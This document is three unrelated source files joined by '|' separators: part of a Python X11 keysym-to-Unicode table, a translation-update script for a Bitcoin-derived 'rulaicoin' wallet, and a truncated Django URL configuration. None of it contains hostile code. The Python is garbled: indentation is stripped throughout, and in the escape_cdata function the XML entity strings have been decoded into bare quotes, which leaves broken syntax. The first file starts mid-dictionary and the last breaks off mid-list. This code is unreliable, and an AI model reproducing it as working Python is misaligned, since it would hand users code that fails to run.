'club': (0x0aec, u'\u2663'),
'colon': (0x003a, u'\u003A'),
'comma': (0x002c, u'\u002C'),
'containsas': (0x100220B, u'\u220B'),
'copyright': (0x00a9, u'\u00A9'),
'cr': (0x09e4, u'\u240D'),
'crossinglines': (0x09ee, u'\u253C'),
'cuberoot': (0x100221B, u'\u221B'),
'currency': (0x00a4, u'\u00A4'),
'd': (0x0064, u'\u0064'),
'dabovedot': (0x1001e0b, u'\u1E0B'),
'dagger': (0x0af1, u'\u2020'),
'dcaron': (0x01ef, u'\u010F'),
'dead_A': (0xfe81, None),
'dead_E': (0xfe83, None),
'dead_I': (0xfe85, None),
'dead_O': (0xfe87, None),
'dead_U': (0xfe89, None),
'dead_a': (0xfe80, None),
'dead_abovecomma': (0xfe64, u'\u0315'),
'dead_abovedot': (0xfe56, u'\u0307'),
'dead_abovereversedcomma': (0xfe65, u'\u0312'),
'dead_abovering': (0xfe58, u'\u030A'),
'dead_aboveverticalline': (0xfe91, u'\u030D'),
'dead_acute': (0xfe51, u'\u0301'),
'dead_belowbreve': (0xfe6b, u'\u032E'),
'dead_belowcircumflex': (0xfe69, u'\u032D'),
'dead_belowcomma': (0xfe6e, u'\u0326'),
'dead_belowdiaeresis': (0xfe6c, u'\u0324'),
'dead_belowdot': (0xfe60, u'\u0323'),
'dead_belowmacron': (0xfe68, u'\u0331'),
'dead_belowring': (0xfe67, u'\u0325'),
'dead_belowtilde': (0xfe6a, u'\u0330'),
'dead_belowverticalline': (0xfe92, u'\u0329'),
'dead_breve': (0xfe55, u'\u0306'),
'dead_capital_schwa': (0xfe8b, None),
'dead_caron': (0xfe5a, u'\u030C'),
'dead_cedilla': (0xfe5b, u'\u0327'),
'dead_circumflex': (0xfe52, u'\u0302'),
'dead_currency': (0xfe6f, None),
'dead_diaeresis': (0xfe57, u'\u0308'),
'dead_doubleacute': (0xfe59, u'\u030B'),
'dead_doublegrave': (0xfe66, u'\u030F'),
'dead_e': (0xfe82, None),
'dead_grave': (0xfe50, u'\u0300'),
'dead_greek': (0xfe8c, None),
'dead_hook': (0xfe61, u'\u0309'),
'dead_horn': (0xfe62, u'\u031B'),
'dead_i': (0xfe84, None),
'dead_invertedbreve': (0xfe6d, u'\u032F'),
'dead_iota': (0xfe5d, u'\u0345'),
'dead_longsolidusoverlay': (0xfe93, u'\u0338'),
'dead_lowline': (0xfe90, u'\u0332'),
'dead_macron': (0xfe54, u'\u0304'),
'dead_o': (0xfe86, None),
'dead_ogonek': (0xfe5c, u'\u0328'),
'dead_semivoiced_sound': (0xfe5f, None),
'dead_small_schwa': (0xfe8a, None),
'dead_stroke': (0xfe63, u'\u0335'),
'dead_tilde': (0xfe53, u'\u0303'),
'dead_u': (0xfe88, None),
'dead_voiced_sound': (0xfe5e, None),
'degree': (0x00b0, u'\u00B0'),
'diaeresis': (0x00a8, u'\u00A8'),
'diamond': (0x0aed, u'\u2666'),
'digitspace': (0x0aa5, u'\u2007'),
'dintegral': (0x100222C, u'\u222C'),
'division': (0x00f7, u'\u00F7'),
'dollar': (0x0024, u'\u0024'),
'doubbaselinedot': (0x0aaf, u'\u2025'),
'doubleacute': (0x01bd, u'\u02DD'),
'doubledagger': (0x0af2, u'\u2021'),
'doublelowquotemark': (0x0afe, u'\u201E'),
'downarrow': (0x08fe, u'\u2193'),
'downstile': (0x0bc4, u'\u230A'),
'downtack': (0x0bc2, u'\u22A4'),
'dstroke': (0x01f0, u'\u0111'),
'e': (0x0065, u'\u0065'),
'eabovedot': (0x03ec, u'\u0117'),
'eacute': (0x00e9, u'\u00E9'),
'ebelowdot': (0x1001eb9, u'\u1EB9'),
'ecaron': (0x01ec, u'\u011B'),
'ecircumflex': (0x00ea, u'\u00EA'),
'ecircumflexacute': (0x1001ebf, u'\u1EBF'),
'ecircumflexbelowdot': (0x1001ec7, u'\u1EC7'),
'ecircumflexgrave': (0x1001ec1, u'\u1EC1'),
'ecircumflexhook': (0x1001ec3, u'\u1EC3'),
'ecircumflextilde': (0x1001ec5, u'\u1EC5'),
'ediaeresis': (0x00eb, u'\u00EB'),
'egrave': (0x00e8, u'\u00E8'),
'ehook': (0x1001ebb, u'\u1EBB'),
'eightsubscript': (0x1002088, u'\u2088'),
'eightsuperior': (0x1002078, u'\u2078'),
'elementof': (0x1002208, u'\u2208'),
'ellipsis': (0x0aae, u'\u2026'),
'em3space': (0x0aa3, u'\u2004'),
'em4space': (0x0aa4, u'\u2005'),
'emacron': (0x03ba, u'\u0113'),
'emdash': (0x0aa9, u'\u2014'),
'emptyset': (0x1002205, u'\u2205'),
'emspace': (0x0aa1, u'\u2003'),
'endash': (0x0aaa, u'\u2013'),
'eng': (0x03bf, u'\u014B'),
'enspace': (0x0aa2, u'\u2002'),
'eogonek': (0x01ea, u'\u0119'),
'equal': (0x003d, u'\u003D'),
'eth': (0x00f0, u'\u00F0'),
'etilde': (0x1001ebd, u'\u1EBD'),
'exclam': (0x0021, u'\u0021'),
'exclamdown': (0x00a1, u'\u00A1'),
'ezh': (0x1000292, u'\u0292'),
'f': (0x0066, u'\u0066'),
'fabovedot': (0x1001e1f, u'\u1E1F'),
'femalesymbol': (0x0af8, u'\u2640'),
'ff': (0x09e3, u'\u240C'),
'figdash': (0x0abb, u'\u2012'),
'fiveeighths': (0x0ac5, u'\u215D'),
'fivesixths': (0x0ab7, u'\u215A'),
'fivesubscript': (0x1002085, u'\u2085'),
'fivesuperior': (0x1002075, u'\u2075'),
'fourfifths': (0x0ab5, u'\u2158'),
'foursubscript': (0x1002084, u'\u2084'),
'foursuperior': (0x1002074, u'\u2074'),
'fourthroot': (0x100221C, u'\u221C'),
'function': (0x08f6, u'\u0192'),
'g': (0x0067, u'\u0067'),
'gabovedot': (0x02f5, u'\u0121'),
'gbreve': (0x02bb, u'\u011F'),
'gcaron': (0x10001e7, u'\u01E7'),
'gcedilla': (0x03bb, u'\u0123'),
'gcircumflex': (0x02f8, u'\u011D'),
'grave': (0x0060, u'\u0060'),
'greater': (0x003e, u'\u003E'),
'greaterthanequal': (0x08be, u'\u2265'),
'guillemotleft': (0x00ab, u'\u00AB'),
'guillemotright': (0x00bb, u'\u00BB'),
'h': (0x0068, u'\u0068'),
'hairspace': (0x0aa8, u'\u200A'),
'hcircumflex': (0x02b6, u'\u0125'),
'heart': (0x0aee, u'\u2665'),
'hebrew_aleph': (0x0ce0, u'\u05D0'),
'hebrew_ayin': (0x0cf2, u'\u05E2'),
'hebrew_bet': (0x0ce1, u'\u05D1'),
'hebrew_chet': (0x0ce7, u'\u05D7'),
'hebrew_dalet': (0x0ce3, u'\u05D3'),
'hebrew_doublelowline': (0x0cdf, u'\u2017'),
'hebrew_finalkaph': (0x0cea, u'\u05DA'),
'hebrew_finalmem': (0x0ced, u'\u05DD'),
'hebrew_finalnun': (0x0cef, u'\u05DF'),
'hebrew_finalpe': (0x0cf3, u'\u05E3'),
'hebrew_finalzade': (0x0cf5, u'\u05E5'),
'hebrew_gimel': (0x0ce2, u'\u05D2'),
'hebrew_he': (0x0ce4, u'\u05D4'),
'hebrew_kaph': (0x0ceb, u'\u05DB'),
'hebrew_lamed': (0x0cec, u'\u05DC'),
'hebrew_mem': (0x0cee, u'\u05DE'),
'hebrew_nun': (0x0cf0, u'\u05E0'),
'hebrew_pe': (0x0cf4, u'\u05E4'),
'hebrew_qoph': (0x0cf7, u'\u05E7'),
'hebrew_resh': (0x0cf8, u'\u05E8'),
'hebrew_samech': (0x0cf1, u'\u05E1'),
'hebrew_shin': (0x0cf9, u'\u05E9'),
'hebrew_taw': (0x0cfa, u'\u05EA'),
'hebrew_tet': (0x0ce8, u'\u05D8'),
'hebrew_waw': (0x0ce5, u'\u05D5'),
'hebrew_yod': (0x0ce9, u'\u05D9'),
'hebrew_zade': (0x0cf6, u'\u05E6'),
'hebrew_zain': (0x0ce6, u'\u05D6'),
'horizlinescan1': (0x09ef, u'\u23BA'),
'horizlinescan3': (0x09f0, u'\u23BB'),
'horizlinescan5': (0x09f1, u'\u2500'),
'horizlinescan7': (0x09f2, u'\u23BC'),
'horizlinescan9': (0x09f3, u'\u23BD'),
'hstroke': (0x02b1, u'\u0127'),
'ht': (0x09e2, u'\u2409'),
'hyphen': (0x00ad, u'\u00AD'),
'i': (0x0069, u'\u0069'),
'iacute': (0x00ed, u'\u00ED'),
'ibelowdot': (0x1001ecb, u'\u1ECB'),
'ibreve': (0x100012d, u'\u012D'),
'icircumflex': (0x00ee, u'\u00EE'),
'identical': (0x08cf, u'\u2261'),
'idiaeresis': (0x00ef, u'\u00EF'),
'idotless': (0x02b9, u'\u0131'),
'ifonlyif': (0x08cd, u'\u21D4'),
'igrave': (0x00ec, u'\u00EC'),
'ihook': (0x1001ec9, u'\u1EC9'),
'imacron': (0x03ef, u'\u012B'),
'implies': (0x08ce, u'\u21D2'),
'includedin': (0x08da, u'\u2282'),
'includes': (0x08db, u'\u2283'),
'infinity': (0x08c2, u'\u221E'),
'integral': (0x08bf, u'\u222B'),
'intersection': (0x08dc, u'\u2229'),
'iogonek': (0x03e7, u'\u012F'),
'itilde': (0x03b5, u'\u0129'),
'j': (0x006a, u'\u006A'),
'jcircumflex': (0x02bc, u'\u0135'),
'jot': (0x0bca, u'\u2218'),
'k': (0x006b, u'\u006B'),
'kana_A': (0x04b1, u'\u30A2'),
'kana_CHI': (0x04c1, u'\u30C1'),
'kana_E': (0x04b4, u'\u30A8'),
'kana_FU': (0x04cc, u'\u30D5'),
'kana_HA': (0x04ca, u'\u30CF'),
'kana_HE': (0x04cd, u'\u30D8'),
'kana_HI': (0x04cb, u'\u30D2'),
'kana_HO': (0x04ce, u'\u30DB'),
'kana_I': (0x04b2, u'\u30A4'),
'kana_KA': (0x04b6, u'\u30AB'),
'kana_KE': (0x04b9, u'\u30B1'),
'kana_KI': (0x04b7, u'\u30AD'),
'kana_KO': (0x04ba, u'\u30B3'),
'kana_KU': (0x04b8, u'\u30AF'),
'kana_MA': (0x04cf, u'\u30DE'),
'kana_ME': (0x04d2, u'\u30E1'),
'kana_MI': (0x04d0, u'\u30DF'),
'kana_MO': (0x04d3, u'\u30E2'),
'kana_MU': (0x04d1, u'\u30E0'),
'kana_N': (0x04dd, u'\u30F3'),
'kana_NA': (0x04c5, u'\u30CA'),
'kana_NE': (0x04c8, u'\u30CD'),
'kana_NI': (0x04c6, u'\u30CB'),
'kana_NO': (0x04c9, u'\u30CE'),
'kana_NU': (0x04c7, u'\u30CC'),
'kana_O': (0x04b5, u'\u30AA'),
'kana_RA': (0x04d7, u'\u30E9'),
'kana_RE': (0x04da, u'\u30EC'),
'kana_RI': (0x04d8, u'\u30EA'),
'kana_RO': (0x04db, u'\u30ED'),
'kana_RU': (0x04d9, u'\u30EB'),
'kana_SA': (0x04bb, u'\u30B5'),
'kana_SE': (0x04be, u'\u30BB'),
'kana_SHI': (0x04bc, u'\u30B7'),
'kana_SO': (0x04bf, u'\u30BD'),
'kana_SU': (0x04bd, u'\u30B9'),
'kana_TA': (0x04c0, u'\u30BF'),
'kana_TE': (0x04c3, u'\u30C6'),
'kana_TO': (0x04c4, u'\u30C8'),
'kana_TSU': (0x04c2, u'\u30C4'),
'kana_U': (0x04b3, u'\u30A6'),
'kana_WA': (0x04dc, u'\u30EF'),
'kana_WO': (0x04a6, u'\u30F2'),
'kana_YA': (0x04d4, u'\u30E4'),
'kana_YO': (0x04d6, u'\u30E8'),
'kana_YU': (0x04d5, u'\u30E6'),
'kana_a': (0x04a7, u'\u30A1'),
'kana_closingbracket': (0x04a3, u'\u300D'),
'kana_comma': (0x04a4, u'\u3001'),
'kana_conjunctive': (0x04a5, u'\u30FB'),
'kana_e': (0x04aa, u'\u30A7'),
'kana_fullstop': (0x04a1, u'\u3002'),
'kana_i': (0x04a8, u'\u30A3'),
'kana_o': (0x04ab, u'\u30A9'),
'kana_openingbracket': (0x04a2, u'\u300C'),
'kana_tsu': (0x04af, u'\u30C3'),
'kana_u': (0x04a9, u'\u30A5'),
'kana_ya': (0x04ac, u'\u30E3'),
'kana_yo': (0x04ae, u'\u30E7'),
'kana_yu': (0x04ad, u'\u30E5'),
'kcedilla': (0x03f3, u'\u0137'),
'kra': (0x03a2, u'\u0138'),
'l': (0x006c, u'\u006C'),
'lacute': (0x01e5, u'\u013A'),
'latincross': (0x0ad9, u'\u271D'),
'lbelowdot': (0x1001e37, u'\u1E37'),
'lcaron': (0x01b5, u'\u013E'),
'lcedilla': (0x03b6, u'\u013C'),
'leftarrow': (0x08fb, u'\u2190'),
'leftdoublequotemark': (0x0ad2, u'\u201C'),
'leftmiddlecurlybrace': (0x08af, u'\u23A8'),
'leftradical': (0x08a1, u'\u23B7'),
'leftsinglequotemark': (0x0ad0, u'\u2018'),
'leftt': (0x09f4, u'\u251C'),
'lefttack': (0x0bdc, u'\u22A3'),
'less': (0x003c, u'\u003C'),
'lessthanequal': (0x08bc, u'\u2264'),
'lf': (0x09e5, u'\u240A'),
'logicaland': (0x08de, u'\u2227'),
'logicalor': (0x08df, u'\u2228'),
'lowleftcorner': (0x09ed, u'\u2514'),
'lowrightcorner': (0x09ea, u'\u2518'),
'lstroke': (0x01b3, u'\u0142'),
'm': (0x006d, u'\u006D'),
'mabovedot': (0x1001e41, u'\u1E41'),
'macron': (0x00af, u'\u00AF'),
'malesymbol': (0x0af7, u'\u2642'),
'maltesecross': (0x0af0, u'\u2720'),
'masculine': (0x00ba, u'\u00BA'),
'minus': (0x002d, u'\u002D'),
'minutes': (0x0ad6, u'\u2032'),
'mu': (0x00b5, u'\u00B5'),
'multiply': (0x00d7, u'\u00D7'),
'musicalflat': (0x0af6, u'\u266D'),
'musicalsharp': (0x0af5, u'\u266F'),
'n': (0x006e, u'\u006E'),
'nabla': (0x08c5, u'\u2207'),
'nacute': (0x01f1, u'\u0144'),
'ncaron': (0x01f2, u'\u0148'),
'ncedilla': (0x03f1, u'\u0146'),
'ninesubscript': (0x1002089, u'\u2089'),
'ninesuperior': (0x1002079, u'\u2079'),
'nl': (0x09e8, u'\u2424'),
'nobreakspace': (0x00a0, u'\u00A0'),
'notapproxeq': (0x1002247, u'\u2247'),
'notelementof': (0x1002209, u'\u2209'),
'notequal': (0x08bd, u'\u2260'),
'notidentical': (0x1002262, u'\u2262'),
'notsign': (0x00ac, u'\u00AC'),
'ntilde': (0x00f1, u'\u00F1'),
'numbersign': (0x0023, u'\u0023'),
'numerosign': (0x06b0, u'\u2116'),
'o': (0x006f, u'\u006F'),
'oacute': (0x00f3, u'\u00F3'),
'obarred': (0x1000275, u'\u0275'),
'obelowdot': (0x1001ecd, u'\u1ECD'),
'ocaron': (0x10001d2, u'\u01D2'),
'ocircumflex': (0x00f4, u'\u00F4'),
'ocircumflexacute': (0x1001ed1, u'\u1ED1'),
'ocircumflexbelowdot': (0x1001ed9, u'\u1ED9'),
'ocircumflexgrave': (0x1001ed3, u'\u1ED3'),
'ocircumflexhook': (0x1001ed5, u'\u1ED5'),
'ocircumflextilde': (0x1001ed7, u'\u1ED7'),
'odiaeresis': (0x00f6, u'\u00F6'),
'odoubleacute': (0x01f5, u'\u0151'),
'oe': (0x13bd, u'\u0153'),
'ogonek': (0x01b2, u'\u02DB'),
'ograve': (0x00f2, u'\u00F2'),
'ohook': (0x1001ecf, u'\u1ECF'),
'ohorn': (0x10001a1, u'\u01A1'),
'ohornacute': (0x1001edb, u'\u1EDB'),
'ohornbelowdot': (0x1001ee3, u'\u1EE3'),
'ohorngrave': (0x1001edd, u'\u1EDD'),
'ohornhook': (0x1001edf, u'\u1EDF'),
'ohorntilde': (0x1001ee1, u'\u1EE1'),
'omacron': (0x03f2, u'\u014D'),
'oneeighth': (0x0ac3, u'\u215B'),
'onefifth': (0x0ab2, u'\u2155'),
'onehalf': (0x00bd, u'\u00BD'),
'onequarter': (0x00bc, u'\u00BC'),
'onesixth': (0x0ab6, u'\u2159'),
'onesubscript': (0x1002081, u'\u2081'),
'onesuperior': (0x00b9, u'\u00B9'),
'onethird': (0x0ab0, u'\u2153'),
'ooblique': (0x00f8, u'\u00F8'),
'ordfeminine': (0x00aa, u'\u00AA'),
'oslash': (0x00f8, u'\u00F8'),
'otilde': (0x00f5, u'\u00F5'),
'overline': (0x047e, u'\u203E'),
'p': (0x0070, u'\u0070'),
'pabovedot': (0x1001e57, u'\u1E57'),
'paragraph': (0x00b6, u'\u00B6'),
'parenleft': (0x0028, u'\u0028'),
'parenright': (0x0029, u'\u0029'),
'partdifferential': (0x1002202, u'\u2202'),
'partialderivative': (0x08ef, u'\u2202'),
'percent': (0x0025, u'\u0025'),
'period': (0x002e, u'\u002E'),
'periodcentered': (0x00b7, u'\u00B7'),
'permille': (0x0ad5, u'\u2030'),
'phonographcopyright': (0x0afb, u'\u2117'),
'plus': (0x002b, u'\u002B'),
'plusminus': (0x00b1, u'\u00B1'),
'prescription': (0x0ad4, u'\u211E'),
'prolongedsound': (0x04b0, u'\u30FC'),
'punctspace': (0x0aa6, u'\u2008'),
'q': (0x0071, u'\u0071'),
'quad': (0x0bcc, u'\u2395'),
'question': (0x003f, u'\u003F'),
'questiondown': (0x00bf, u'\u00BF'),
'quotedbl': (0x0022, u'\u0022'),
'r': (0x0072, u'\u0072'),
'racute': (0x01e0, u'\u0155'),
'radical': (0x08d6, u'\u221A'),
'rcaron': (0x01f8, u'\u0159'),
'rcedilla': (0x03b3, u'\u0157'),
'registered': (0x00ae, u'\u00AE'),
'rightarrow': (0x08fd, u'\u2192'),
'rightdoublequotemark': (0x0ad3, u'\u201D'),
'rightmiddlecurlybrace': (0x08b0, u'\u23AC'),
'rightsinglequotemark': (0x0ad1, u'\u2019'),
'rightt': (0x09f5, u'\u2524'),
'righttack': (0x0bfc, u'\u22A2'),
's': (0x0073, u'\u0073'),
'sabovedot': (0x1001e61, u'\u1E61'),
'sacute': (0x01b6, u'\u015B'),
'scaron': (0x01b9, u'\u0161'),
'scedilla': (0x01ba, u'\u015F'),
'schwa': (0x1000259, u'\u0259'),
'scircumflex': (0x02fe, u'\u015D'),
'seconds': (0x0ad7, u'\u2033'),
'section': (0x00a7, u'\u00A7'),
'semicolon': (0x003b, u'\u003B'),
'semivoicedsound': (0x04df, u'\u309C'),
'seveneighths': (0x0ac6, u'\u215E'),
'sevensubscript': (0x1002087, u'\u2087'),
'sevensuperior': (0x1002077, u'\u2077'),
'similarequal': (0x08c9, u'\u2243'),
'singlelowquotemark': (0x0afd, u'\u201A'),
'sixsubscript': (0x1002086, u'\u2086'),
'sixsuperior': (0x1002076, u'\u2076'),
'slash': (0x002f, u'\u002F'),
'soliddiamond': (0x09e0, u'\u25C6'),
'space': (0x0020, u'\u0020'),
'squareroot': (0x100221A, u'\u221A'),
'ssharp': (0x00df, u'\u00DF'),
'sterling': (0x00a3, u'\u00A3'),
'stricteq': (0x1002263, u'\u2263'),
't': (0x0074, u'\u0074'),
'tabovedot': (0x1001e6b, u'\u1E6B'),
'tcaron': (0x01bb, u'\u0165'),
'tcedilla': (0x01fe, u'\u0163'),
'telephone': (0x0af9, u'\u260E'),
'telephonerecorder': (0x0afa, u'\u2315'),
'therefore': (0x08c0, u'\u2234'),
'thinspace': (0x0aa7, u'\u2009'),
'thorn': (0x00fe, u'\u00FE'),
'threeeighths': (0x0ac4, u'\u215C'),
'threefifths': (0x0ab4, u'\u2157'),
'threequarters': (0x00be, u'\u00BE'),
'threesubscript': (0x1002083, u'\u2083'),
'threesuperior': (0x00b3, u'\u00B3'),
'tintegral': (0x100222D, u'\u222D'),
'topintegral': (0x08a4, u'\u2320'),
'topleftparens': (0x08ab, u'\u239B'),
'topleftsqbracket': (0x08a7, u'\u23A1'),
'toprightparens': (0x08ad, u'\u239E'),
'toprightsqbracket': (0x08a9, u'\u23A4'),
'topt': (0x09f7, u'\u252C'),
'trademark': (0x0ac9, u'\u2122'),
'tslash': (0x03bc, u'\u0167'),
'twofifths': (0x0ab3, u'\u2156'),
'twosubscript': (0x1002082, u'\u2082'),
'twosuperior': (0x00b2, u'\u00B2'),
'twothirds': (0x0ab1, u'\u2154'),
'u': (0x0075, u'\u0075'),
'uacute': (0x00fa, u'\u00FA'),
'ubelowdot': (0x1001ee5, u'\u1EE5'),
'ubreve': (0x02fd, u'\u016D'),
'ucircumflex': (0x00fb, u'\u00FB'),
'udiaeresis': (0x00fc, u'\u00FC'),
'udoubleacute': (0x01fb, u'\u0171'),
'ugrave': (0x00f9, u'\u00F9'),
'uhook': (0x1001ee7, u'\u1EE7'),
'uhorn': (0x10001b0, u'\u01B0'),
'uhornacute': (0x1001ee9, u'\u1EE9'),
'uhornbelowdot': (0x1001ef1, u'\u1EF1'),
'uhorngrave': (0x1001eeb, u'\u1EEB'),
'uhornhook': (0x1001eed, u'\u1EED'),
'uhorntilde': (0x1001eef, u'\u1EEF'),
'umacron': (0x03fe, u'\u016B'),
'underscore': (0x005f, u'\u005F'),
'union': (0x08dd, u'\u222A'),
'uogonek': (0x03f9, u'\u0173'),
'uparrow': (0x08fc, u'\u2191'),
'upleftcorner': (0x09ec, u'\u250C'),
'uprightcorner': (0x09eb, u'\u2510'),
'upstile': (0x0bd3, u'\u2308'),
'uptack': (0x0bce, u'\u22A5'),
'uring': (0x01f9, u'\u016F'),
'utilde': (0x03fd, u'\u0169'),
'v': (0x0076, u'\u0076'),
'variation': (0x08c1, u'\u221D'),
'vertbar': (0x09f8, u'\u2502'),
'voicedsound': (0x04de, u'\u309B'),
'vt': (0x09e9, u'\u240B'),
'w': (0x0077, u'\u0077'),
'wacute': (0x1001e83, u'\u1E83'),
'wcircumflex': (0x1000175, u'\u0175'),
'wdiaeresis': (0x1001e85, u'\u1E85'),
'wgrave': (0x1001e81, u'\u1E81'),
'x': (0x0078, u'\u0078'),
'xabovedot': (0x1001e8b, u'\u1E8B'),
'y': (0x0079, u'\u0079'),
'yacute': (0x00fd, u'\u00FD'),
'ybelowdot': (0x1001ef5, u'\u1EF5'),
'ycircumflex': (0x1000177, u'\u0177'),
'ydiaeresis': (0x00ff, u'\u00FF'),
'yen': (0x00a5, u'\u00A5'),
'ygrave': (0x1001ef3, u'\u1EF3'),
'yhook': (0x1001ef7, u'\u1EF7'),
'ytilde': (0x1001ef9, u'\u1EF9'),
'z': (0x007a, u'\u007A'),
'zabovedot': (0x01bf, u'\u017C'),
'zacute': (0x01bc, u'\u017A'),
'zcaron': (0x01be, u'\u017E'),
'zerosubscript': (0x1002080, u'\u2080'),
'zerosuperior': (0x1002070, u'\u2070'),
'zstroke': (0x10001b6, u'\u01B6')}
DEAD_KEYS = {
u'\u0307': u'\u02D9',
u'\u030A': u'\u02DA',
u'\u0301': u'\u00B4',
u'\u0306': u'\u02D8',
u'\u030C': u'\u02C7',
u'\u0327': u'\u00B8',
u'\u0302': u'\u005E',
u'\u0308': u'\u00A8',
u'\u030B': u'\u02DD',
u'\u0300': u'\u0060',
u'\u0345': u'\u037A',
u'\u0332': u'\u005F',
u'\u0304': u'\u00AF',
u'\u0328': u'\u02DB',
u'\u0303': u'\u007E'}
KEYPAD_KEYS = {
'KP_0': 0xffb0,
'KP_1': 0xffb1,
'KP_2': 0xffb2,
'KP_3': 0xffb3,
'KP_4': 0xffb4,
'KP_5': 0xffb5,
'KP_6': 0xffb6,
'KP_7': 0xffb7,
'KP_8': 0xffb8,
'KP_9': 0xffb9,
'KP_Add': 0xffab,
'KP_Begin': 0xff9d,
'KP_Decimal': 0xffae,
'KP_Delete': 0xff9f,
'KP_Divide': 0xffaf,
'KP_Down': 0xff99,
'KP_End': 0xff9c,
'KP_Enter': 0xff8d,
'KP_Equal': 0xffbd,
'KP_F1': 0xff91,
'KP_F2': 0xff92,
'KP_F3': 0xff93,
'KP_F4': 0xff94,
'KP_Home': 0xff95,
'KP_Insert': 0xff9e,
'KP_Left': 0xff96,
'KP_Multiply': 0xffaa,
'KP_Next': 0xff9b,
'KP_Page_Down': 0xff9b,
'KP_Page_Up': 0xff9a,
'KP_Prior': 0xff9a,
'KP_Right': 0xff98,
'KP_Separator': 0xffac,
'KP_Space': 0xff80,
'KP_Subtract': 0xffad,
'KP_Tab': 0xff89,
'KP_Up': 0xff97}
CHARS = {
codepoint: name
for name, (keysym, codepoint) in SYMBOLS.items()
if codepoint}
KEYSYMS = {
keysym: name
for name, (keysym, codepoint) in SYMBOLS.items()
if codepoint}
|
#!/usr/bin/python
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Run this script from the root of the repository to update all translations from
transifex.
It will do the following automatically:
- fetch all translations using the tx tool
- post-process them into valid and committable format
- remove invalid control characters
- remove location tags (makes diffs less noisy)
TODO:
- auto-add new translations to the build system according to the translation process
'''
from __future__ import division, print_function
import subprocess
import re
import sys
import os
import io
import xml.etree.ElementTree as ET
# Name of transifex tool
TX = 'tx'
# Name of source language file
SOURCE_LANG = 'rulaicoin_en.ts'
# Directory with locale files
LOCALE_DIR = 'src/qt/locale'
# Minimum number of messages for translation to be considered at all
MIN_NUM_MESSAGES = 10
def check_at_repository_root():
if not os.path.exists('.git'):
print('No .git directory found')
print('Execute this script at the root of the repository', file=sys.stderr)
exit(1)
def fetch_all_translations():
if subprocess.call([TX, 'pull', '-f', '-a']):
print('Error while fetching translations', file=sys.stderr)
exit(1)
def find_format_specifiers(s):
'''Find all format specifiers in a string.'''
pos = 0
specifiers = []
while True:
percent = s.find('%', pos)
if percent < 0:
break
try:
specifiers.append(s[percent+1])
except:
print('Failed to get specifier')
pos = percent+2
return specifiers
def split_format_specifiers(specifiers):
'''Split format specifiers between numeric (Qt) and others (strprintf)'''
numeric = []
other = []
for s in specifiers:
if s in {'1','2','3','4','5','6','7','8','9'}:
numeric.append(s)
else:
other.append(s)
# numeric (Qt) can be present in any order, others (strprintf) must be in specified order
return set(numeric),other
def sanitize_string(s):
'''Sanitize string for printing'''
return s.replace('\n',' ')
def check_format_specifiers(source, translation, errors, numerus):
source_f = split_format_specifiers(find_format_specifiers(source))
# assert that no source messages contain both Qt and strprintf format specifiers
# if this fails, go change the source as this is hacky and confusing!
#assert(not(source_f[0] and source_f[1]))
try:
translation_f = split_format_specifiers(find_format_specifiers(translation))
except IndexError:
errors.append("Parse error in translation for '%s': '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
else:
if source_f != translation_f:
if numerus and source_f == (set(), ['n']) and translation_f == (set(), []) and translation.find('%') == -1:
# Allow numerus translations to omit %n specifier (usually when it only has one possible value)
return True
errors.append("Mismatch between '%s' and '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
return True
def all_ts_files(suffix=''):
for filename in os.listdir(LOCALE_DIR):
# process only language files, and do not process source language
if not filename.endswith('.ts'+suffix) or filename == SOURCE_LANG+suffix:
continue
if suffix: # remove provided suffix
filename = filename[0:-len(suffix)]
filepath = os.path.join(LOCALE_DIR, filename)
yield(filename, filepath)
FIX_RE = re.compile(b'[\x00-\x09\x0b\x0c\x0e-\x1f]')
def remove_invalid_characters(s):
'''Remove invalid characters from translation string'''
return FIX_RE.sub(b'', s)
# Override cdata escape function to make our output match Qt's (optional, just for cleaner diffs for
# comparison, disable by default)
_orig_escape_cdata = None
def escape_cdata(text):
text = _orig_escape_cdata(text)
text = text.replace("'", ''')
text = text.replace('"', '"')
return text
def postprocess_translations(reduce_diff_hacks=False):
print('Checking and postprocessing...')
if reduce_diff_hacks:
global _orig_escape_cdata
_orig_escape_cdata = ET._escape_cdata
ET._escape_cdata = escape_cdata
for (filename,filepath) in all_ts_files():
os.rename(filepath, filepath+'.orig')
have_errors = False
for (filename,filepath) in all_ts_files('.orig'):
# pre-fixups to cope with transifex output
parser = ET.XMLParser(encoding='utf-8') # need to override encoding because 'utf8' is not understood only 'utf-8'
with open(filepath + '.orig', 'rb') as f:
data = f.read()
# remove control characters; this must be done over the entire file otherwise the XML parser will fail
data = remove_invalid_characters(data)
tree = ET.parse(io.BytesIO(data), parser=parser)
# iterate over all messages in file
root = tree.getroot()
for context in root.findall('context'):
for message in context.findall('message'):
numerus = message.get('numerus') == 'yes'
source = message.find('source').text
translation_node = message.find('translation')
# pick all numerusforms
if numerus:
translations = [i.text for i in translation_node.findall('numerusform')]
else:
translations = [translation_node.text]
for translation in translations:
if translation is None:
continue
errors = []
valid = check_format_specifiers(source, translation, errors, numerus)
for error in errors:
print('%s: %s' % (filename, error))
if not valid: # set type to unfinished and clear string if invalid
translation_node.clear()
translation_node.set('type', 'unfinished')
have_errors = True
# Remove location tags
for location in message.findall('location'):
message.remove(location)
# Remove entire message if it is an unfinished translation
if translation_node.get('type') == 'unfinished':
context.remove(message)
# check if document is (virtually) empty, and remove it if so
num_messages = 0
for context in root.findall('context'):
for message in context.findall('message'):
num_messages += 1
if num_messages < MIN_NUM_MESSAGES:
print('Removing %s, as it contains only %i messages' % (filepath, num_messages))
continue
# write fixed-up tree
# if diff reduction requested, replace some XML to 'sanitize' to qt formatting
if reduce_diff_hacks:
out = io.BytesIO()
tree.write(out, encoding='utf-8')
out = out.getvalue()
out = out.replace(b' />', b'/>')
with open(filepath, 'wb') as f:
f.write(out)
else:
tree.write(filepath, encoding='utf-8')
return have_errors
if __name__ == '__main__':
check_at_repository_root()
# fetch_all_translations()
postprocess_translations()
|
from django.urls import re_path
from django.conf.urls.static import static
from django.conf import settings
from django.contrib import admin
from django.contrib.auth import views as auth_views
from django.views.generic.base import TemplateView
from eTone import views as eTone_views
urlpatterns = [
re_path(r'^admin/', admin.site.urls),
re_path(r'^$', TemplateView.as_view(template_name='home.html'), name='home'),
re_path(r'^login/$', auth_views.LoginView.as_view(), {'template_name': 'login.html'}, name='login'),
re_path(r'^logout/$', auth_views.LogoutView.as_view(), {'template_name': 'logout.html'}, name='logout'),
